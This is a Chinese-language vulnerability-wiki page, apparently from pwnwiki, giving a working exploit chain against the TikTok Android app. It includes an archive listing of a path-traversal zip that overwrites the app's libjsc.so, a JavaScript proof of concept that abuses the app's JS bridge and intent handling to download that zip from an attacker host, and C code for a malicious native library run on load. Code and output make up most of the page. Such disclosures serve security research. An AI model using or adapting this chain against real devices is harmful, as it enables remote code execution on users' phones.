免费、自由、人人可编辑的漏洞库
,
创建了一个zip文件,路径遍历了文件名,覆盖了
/data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
email protected Tiktok % 7z l libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip 7-Zip 64 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64) Scanning the drive for archives: 1 file, 1930 bytes (2 KiB) Listing archive: libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip -- Path = libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip Type = zip Physical Size = 1930 Date Time Attr Size Compressed Name ------------------- ----- ------------ ------------ ------------------------ 2020-11-26 04:08:29 ..... 5896 1496 ../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so ------------------- ----- ------------ ------------ ------------------------ 2020-11-26 04:08:29 5896 1496 1 files
现在我们可以用一个恶意库覆盖native-libraries来执行我们的代码。除非用户重新启动Application,否则它不会被执行。
POC
document.title = "Loading.."; document.write("<h1>Loading..</h1>"); if (document && window.name != "finished") { // the XSS will be fired multiple time before loading the page and after. this condition to make sure that the payload won't fire multiple time. window.name = "finished"; window.ToutiaoJSBridge.invokeMethod(JSON.stringify({ "__callback_id": "0", "func": "preloadMiniApp", "__msg_type": "callback", "params": { "mini_app_url": "https://microapp/" }, "JSSDK": "1", "namespace": "host", "__iframe_url": "http://d.c/" })); // initialize Mini App window.ToutiaoJSBridge.invokeMethod(JSON.stringify({ "__callback_id": "0", "func": "openSchema", "__msg_type": "callback", "params": { "schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%2F%2Fwww.google.com.eg%2F%3Faction%3DsdkUpdate%26latestSDKUrl%3Dhttp%3A%2F%2F{ATTACKER_HOST}%2Flibran_a1ef01b09a3d9400b77144bbf9ad59b1.zip%26sdkUpdateVersion%3D1.87.1.11%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapp.tmatest.TmaTestActivity%3Bpackage%3Dcom.zhiliaoapp.musically%3Baction%3Dandroid.intent.action.VIEW%3Bend%22)%3B%0A&noRedirect=false&title=First%20Stage&disable_app_link=false" }, "JSSDK": "1", "namespace": "host", "__iframe_url": "http://iframe.attacker.com/" })); // Download malicious zip file that will overwite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so setTimeout(function() { window.ToutiaoJSBridge.invokeMethod(JSON.stringify({ "__callback_id": "0", "func": "openSchema", "__msg_type": "callback", "params": { "schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapphost.placeholder.MiniappTabActivity0%3Bpackage%3Dcom.zhiliaoapp.musically%3BS.miniapp_url%3Dhttps%3Bend%22)%3B%0A&noRedirect=false&title=Second%20Stage&disable_app_link=false" }, "JSSDK": "1", "namespace": "host", "__iframe_url": "http://iframe.attacker.com/" })); // load the malicious library after overwrtting it. }, 5000); }
恶意库代码:
#include <jni.h> #include <string> #include <stdlib.h> JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) { system("id > /data/data/com.zhiliaoapp.musically/PoC"); return JNI_VERSION_1_6; }
免费、自由、人人可编辑的漏洞库--pwnwiki.com